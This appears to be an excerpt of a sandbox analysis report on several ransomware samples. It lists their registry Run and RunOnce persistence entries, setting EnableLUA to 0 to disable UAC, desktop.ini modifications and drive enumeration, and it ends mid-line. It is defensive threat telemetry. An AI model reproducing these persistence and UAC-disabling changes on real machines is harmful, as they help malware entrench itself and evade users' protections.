Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\avfaasgyqkzqvibbvue.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tpvpyme.exe = "C:\\Users\\Admin\\Desktop\\00378\\tpvpyme.exe" tpvpyme.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "avfaasgyqkzqvibbvue.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pjsmlcpgxqeuykcbus.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "czlikeuoievovkfhdeqnz.exe ." lurwhzlcveb.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\njuqrkzslgwouicdyyjf.exe ." lurwhzlcveb.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "pjsmlcpgxqeuykcbus.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tzua = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ." lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "pjsmlcpgxqeuykcbus.exe" lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zlmypydmvg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "zryqncncriuikukh.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "czlikeuoievovkfhdeqnz.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "gzhayoaqgyladofdv.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gzhayoaqgyladofdv.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "czlikeuoievovkfhdeqnz.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "gzhayoaqgyladofdv.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe = "C:\\Windows\\System32\\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe" Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "gzhayoaqgyladofdv.exe ." lurwhzlcveb.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "avfaasgyqkzqvibbvue.exe" ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "zryqncncriuikukh.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ajhqekm = "njuqrkzslgwouicdyyjf.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\PCI Subsystem = "C:\\Program Files (x86)\\PCI Subsystem\\pciss.exe" HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{B1A3BC66-CC3D-2FEC-5EB2-1A93B140E6CE} = "C:\\Users\\Admin\\AppData\\Roaming\\Sun\\Sunwin.exe" Sunwin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "pjsmlcpgxqeuykcbus.exe" ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "pjsmlcpgxqeuykcbus.exe ." ajhqekm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\grrcsaemu = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pzyixeho = "avfaasgyqkzqvibbvue.exe ." lurwhzlcveb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "czlikeuoievovkfhdeqnz.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cjfmy = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zryqncncriuikukh.exe ." ajhqekm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\upfqruwsetn = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\trnjou.exe\"" Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tzua = "avfaasgyqkzqvibbvue.exe" ajhqekm.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ajhqekm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ajhqekm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ajhqekm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" lurwhzlcveb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lurwhzlcveb.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification \??\c:\users\public\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\onedrive\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\pictures\saved pictures\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\users\admin\contacts\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\desktop\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\documents\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\saved games\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\public\libraries\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\users\public\documents\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\program files (x86)\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\public\accountpictures\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\public\pictures\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\public\videos\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\users\admin\favorites\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\public\desktop\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\program files\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\public\downloads\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\public\music\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\users\admin\pictures\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\videos\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\pictures\camera roll\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-2437139445-1151884604-3026847218-1000\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification \??\c:\users\admin\3d objects\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\links\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\music\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification \??\c:\users\admin\favorites\links\desktop.ini Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\O: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\P: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\D: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\M: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\K: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\O: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\U: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\T: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\B: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\H: 